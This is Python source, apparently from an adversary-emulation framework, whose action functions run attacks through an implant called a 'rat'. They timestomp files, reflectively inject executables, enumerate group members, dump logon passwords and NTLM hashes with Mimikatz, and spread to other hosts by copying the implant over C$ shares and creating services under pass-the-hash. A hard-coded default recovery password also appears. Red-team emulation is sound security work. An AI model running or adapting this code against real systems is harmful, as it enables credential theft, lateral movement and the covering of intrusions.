async def action(operation, rat, host, file, file_g):
    """Run the ``Perform-Timestomp`` PowerShell function on ``file`` and record the result.

    Args:
        operation: Provides ``execute_powershell``; invoked with the
            ``"timestomper"`` script name and ``parsers.timestomp.timestomp``.
        rat: The rat the PowerShell call is executed through.
        host: Not used by this function.
        file: Object exposing ``path``, ``host`` and ``use_case``.
        file_g: Awaitable callback that receives the new file record.

    Returns:
        ``False`` when the parser returned an empty dict (type 0 failure),
        otherwise ``True`` once ``file_g`` has been awaited.
    """
    parsed = await operation.execute_powershell(
        rat,
        "timestomper",
        PSFunction('Perform-Timestomp', PSArg('FileLocation', file.path), PSArg('Verbose')),
        parsers.timestomp.timestomp,
    )

    # An empty dict is the parser's signal for a type 0 failure: nothing to record.
    if parsed == {}:
        return False

    # The parser reports the flag as the string "True"/"False"; store a bool.
    stomped = parsed["TimestampModified"] == "True"

    record = {
        'path': file.path,
        'host': file.host,
        'use_case': file.use_case,
        'new_creation_time': parsed["CreationTime"],
        'new_last_access': parsed["LastAccessTime"],
        'new_last_write': parsed["LastWriteTime"],
        'old_creation_time': parsed["OldCreationTime"],
        'old_last_access': parsed["OldAccessTime"],
        'old_last_write': parsed["OldWriteTime"],
        'timestomped': stomped,
    }
    await file_g(record)
    return True
def invoke_reflective_pe_injection(rat: Rat, binary_name: str, command: CommandLine):
    """Build the ``Invoke-ReflectivePEInjection`` call for ``binary_name`` and pass it to ``powershell_function``.

    Args:
        rat: The rat the PowerShell function is executed through.
        binary_name: Only used to form the anchor ``"reflectivepe.<binary_name>"``.
        command: Its ``command_line`` becomes the ``ExeArgs`` argument.

    Returns:
        Whatever ``powershell_function`` returns.
    """
    anchor = "reflectivepe.%s" % binary_name
    # escape=None keeps '$EncodedPE' unescaped -- presumably so it is emitted
    # as a PowerShell variable reference rather than a quoted literal; confirm
    # against PSArg.
    ps_call = PSFunction(
        'Invoke-ReflectivePEInjection',
        PSArg('PEbase64', '$EncodedPE', escape=None),
        PSArg('ExeArgs', command.command_line),
    )
    return powershell_function(rat, anchor, ps_call)
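async def fix_domain_pass(op: Operation, target_host: ObservedHost, user: str, password: str, domain: str, srv_op, del_fun,
                          *, recovery_password: str = "CalderaRulez%123"):
    """Spawn a recovery rat on ``target_host``, run ``Password-Mayhem-Clean``, then clean the rat up.

    Args:
        op: Not used by this function.
        target_host: Host the recovery rat is spawned on and the cleanup
            file is attributed to.
        user: Account name; passed to ``spawn_recovery_rat`` and as the
            ``userID`` argument of ``Password-Mayhem-Clean``.
        password: Passed as the ``pass`` argument, escaped with
            ``escape_string_literally``.
        domain: Passed to ``spawn_recovery_rat``.
        srv_op: Passed to ``spawn_recovery_rat`` and ``rat_operation``; its
            ``_interface.powershell_function`` is used as the executor.
        del_fun: Passed to ``clean_recovery_rat``.
        recovery_password: Password used to spawn the recovery rat. The
            default is the value that was previously hard-coded here;
            NOTE(review): a fixed credential in source should be supplied
            from configuration by the caller instead.
    """
    core = await spawn_recovery_rat(target_host, user, recovery_password, domain, srv_op)
    await rat_operation(
        srv_op,
        core,
        srv_op._interface.powershell_function,
        "footprint",
        PSFunction(
            "Password-Mayhem-Clean",
            PSArg("userID", user),
            PSArg('pass', password, escape=escape_string_literally),
        ),
    )
    # Raw string: the original 'C:\cleanup.exe' relied on '\c' not being an
    # escape sequence, which Python flags as an invalid escape (warning).
    # The resulting path bytes are unchanged.
    loc = ObservedFile(path=r'C:\cleanup.exe', host=target_host, use_case='dropped').save()
    await clean_recovery_rat(core, loc, del_fun)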
async def action(operation, rat, host, domain_g, user_g):
    """Enumerate local group members on ``host`` with ``Get-NetLocalGroupMember`` and record each one.

    Args:
        operation: Provides ``execute_powershell``; invoked with the
            ``"powerview"`` script name and ``parsers.powerview.getnetlocalgroupmember``.
        rat: The rat the PowerShell call is executed through.
        host: Its ``hostname`` is the ``ComputerName`` argument; also used as
            the owner of members that carry no domain.
        domain_g: Awaitable callback receiving ``{'dns_domain': ...}`` or
            ``{'windows_domain': ...}``; its result is stored as the user's domain.
        user_g: Awaitable callback receiving each user record.

    Returns:
        Always ``True``.
    """
    members = await operation.execute_powershell(
        rat,
        "powerview",
        PSFunction('Get-NetLocalGroupMember', PSArg('ComputerName', host.hostname)),
        parsers.powerview.getnetlocalgroupmember,
    )

    for member in members:
        record = {key: member[key] for key in ('username', 'is_group', 'sid')}
        # A domain name on the parsed entry (DNS form preferred over the
        # Windows form) marks a domain principal; otherwise the principal is
        # attributed to ``host``.
        if 'dns_domain' in member:
            record['domain'] = await domain_g({'dns_domain': member['dns_domain']})
        elif 'windows_domain' in member:
            record['domain'] = await domain_g({'windows_domain': member['windows_domain']})
        else:
            record['host'] = host
        await user_g(record)

    return True
async def action(operation, rat, user, host, dest_host, cred, domain, file_g):
    """Copy ``rat.executable`` to the ``C$`` share of ``dest_host`` under a ``sekurlsa::pth`` context and record the file.

    Args:
        operation: Provides ``adversary_artifactlist`` (target file name),
            ``reflectively_execute_exe`` and ``execute_powershell``.
        rat: Rat the command runs through; its ``executable`` is the copy source.
        user: Supplies ``username`` for ``sekurlsa::pth``.
        host: Its ``os_version.major_version`` selects the Mimikatz delivery method.
        dest_host: Its ``hostname`` is the copy destination; recorded as ``src_host``.
        cred: Supplies ``hash`` (NTLM) for ``sekurlsa::pth``.
        domain: Supplies ``windows_domain``.
        file_g: Awaitable callback receiving the new file record.

    Returns:
        Always ``True``.
    """
    artifact_name = "\\" + operation.adversary_artifactlist.get_executable_word()
    # 'echo F | xcopy' answers xcopy's file/directory prompt, so missing
    # directories are created without interaction.
    copy_cmd = "cmd.exe /c echo F | xcopy {0} \\\\{1}\\c${2}".format(
        rat.executable, dest_host.hostname, artifact_name)
    mimikatz_command = MimikatzCommand(
        privilege_debug(),
        sekurlsa_pth(user=user.username, domain=domain.windows_domain, ntlm=cred.hash, run=copy_cmd),
        mimi_exit(),
    )

    if host.os_version.major_version >= 10:
        # Compiled mimikatz.exe through the Invoke-ReflectivePEInjection
        # PowerSploit script: works on Windows 10 and on patched older systems
        # (KB3126593 / MS16-014 installed).
        await operation.reflectively_execute_exe(
            rat, "mimi64-exe", mimikatz_command.command, parsers.mimikatz.sekurlsa_pth)
    else:
        # Invoke-Mimikatz (had trouble on Windows 10 as of 8/2017).
        # NOTE(review): this passes ``.command.command_line`` while the other
        # Mimikatz actions in this file pass ``.command`` -- confirm PSArg
        # accepts both forms.
        await operation.execute_powershell(
            rat,
            "powerkatz",
            PSFunction('Invoke-Mimikatz', PSArg("Command", mimikatz_command.command.command_line)),
            parsers.mimikatz.sekurlsa_pth,
        )

    await file_g({
        'src_host': dest_host,
        'src_path': rat.executable,
        'path': "C:" + artifact_name,
        'use_case': 'rat',
    })
    return True
async def action(operation, rat, host, domain_g, credential_g, user_g):
    """Run ``sekurlsa::logonpasswords`` via ``Invoke-Mimikatz`` on ``host`` and record each account and credential.

    Args:
        operation: Provides ``execute_powershell``; invoked with the
            ``"powerkatz"`` script name and
            ``parsers.mimikatz.sekurlsa_logonpasswords_condensed``.
        rat: The rat the PowerShell call is executed through.
        host: Compared against each entry's ``Domain`` to tell local from
            domain accounts; recorded as ``found_on_host``.
        domain_g: Awaitable callback receiving ``{'windows_domain': ...}``.
        user_g: Awaitable callback receiving the user record; its result is
            stored as the credential's ``user``.
        credential_g: Awaitable callback receiving the credential record.

    Returns:
        Always ``True``.
    """
    mimikatz_command = MimikatzCommand(privilege_debug(), sekurlsa_logonpasswords(), mimi_exit())
    # NOTE(review): ``.command`` is passed here, while the xcopy/pass-the-hash
    # action in this file passes ``.command.command_line`` -- confirm PSArg
    # accepts both forms.
    accounts = await operation.execute_powershell(
        rat,
        "powerkatz",
        PSFunction("Invoke-Mimikatz", PSArg("Command", mimikatz_command.command)),
        parsers.mimikatz.sekurlsa_logonpasswords_condensed,
    )

    for entry in accounts:
        user_record = {'username': entry['Username'].lower(), 'is_group': False}

        cred_record = {}
        if 'Password' in entry:
            cred_record['password'] = entry['Password']
        if 'NTLM' in entry:
            cred_record["hash"] = entry['NTLM']

        # A Domain column equal to the hostname means a local account; any other
        # value is treated as a Windows domain.
        if entry['Domain'].lower() == host.hostname.lower():
            user_record['host'] = host
        else:
            user_record['domain'] = await domain_g({'windows_domain': entry['Domain'].lower()})

        cred_record['found_on_host'] = host
        cred_record['user'] = await user_g(user_record)
        await credential_g(cred_record)

    return True
async def action(operation, rat, dest_host, rat_file, cred, user, domain, service_g, rat_g):
    """Create and start a service running ``rat_file`` on ``dest_host`` under a ``sekurlsa::pth`` context.

    Both the ``sc create`` and ``sc start`` command lines are wrapped in a
    ``privilege::debug`` / ``sekurlsa::pth`` / ``exit`` Mimikatz command. When
    ``dest_host`` differs from the rat's own host the ``sc`` calls target
    ``dest_host.fqdn``; otherwise ``remote_host`` is ``None``.

    Args:
        operation: Provides ``adversary_artifactlist`` (service name),
            ``reflectively_execute_exe`` and ``execute_powershell``.
        rat: Rat the commands run through; ``rat.host.os_version`` selects the
            Mimikatz delivery method.
        dest_host: Host the service is created on; recorded via ``service_g``.
        rat_file: Its ``path`` is the service binary path.
        cred: Supplies ``hash`` (NTLM) for ``sekurlsa::pth``.
        user: Supplies ``username``.
        domain: Supplies ``windows_domain``.
        service_g: Awaitable callback receiving ``{'name', 'bin_path', 'host'}``.
        rat_g: Awaitable callback invoked once, after the service has been started.

    Returns:
        Always ``True``.
    """
    svcname = operation.adversary_artifactlist.get_service_word()
    remote_host = dest_host.fqdn if dest_host != rat.host else None
    bin_path = rat_file.path

    def pth_wrapped(sc_call):
        # Wrap the command line of an sc result in privilege::debug / sekurlsa::pth / exit.
        return MimikatzCommand(
            privilege_debug(),
            sekurlsa_pth(
                user=user.username,
                domain=domain.windows_domain,
                ntlm=cred.hash,
                run=sc_call()[0].command_line),
            mimi_exit())

    create_command = pth_wrapped(lambda: sc.create(bin_path, svcname, remote_host=remote_host))
    start_command = pth_wrapped(lambda: sc.start(svcname, remote_host=remote_host))

    # Windows 10 (and patched older systems, KB3126593 / MS16-014 installed)
    # get the compiled mimikatz.exe through the Invoke-ReflectivePEInjection
    # PowerSploit script; everything else uses Invoke-Mimikatz, which had
    # trouble on Windows 10 as of 8/2017.
    use_reflective = rat.host.os_version.major_version >= 10

    async def run_mimikatz(mimikatz_command):
        if use_reflective:
            await operation.reflectively_execute_exe(
                rat, "mimi64-exe", mimikatz_command.command, parsers.mimikatz.sekurlsa_pth)
        else:
            # NOTE(review): ``.command`` is passed here, while the xcopy/pass-the-hash
            # action in this file passes ``.command.command_line`` -- confirm PSArg
            # accepts both forms.
            await operation.execute_powershell(
                rat,
                "powerkatz",
                PSFunction('Invoke-Mimikatz', PSArg("Command", mimikatz_command.command)),
                parsers.mimikatz.sekurlsa_pth,
            )

    # Order matters: the service is recorded between creation and start in both
    # delivery paths.
    await run_mimikatz(create_command)
    await service_g({'name': svcname, 'bin_path': rat_file.path, 'host': dest_host})
    await run_mimikatz(start_command)
    await rat_g()
    return True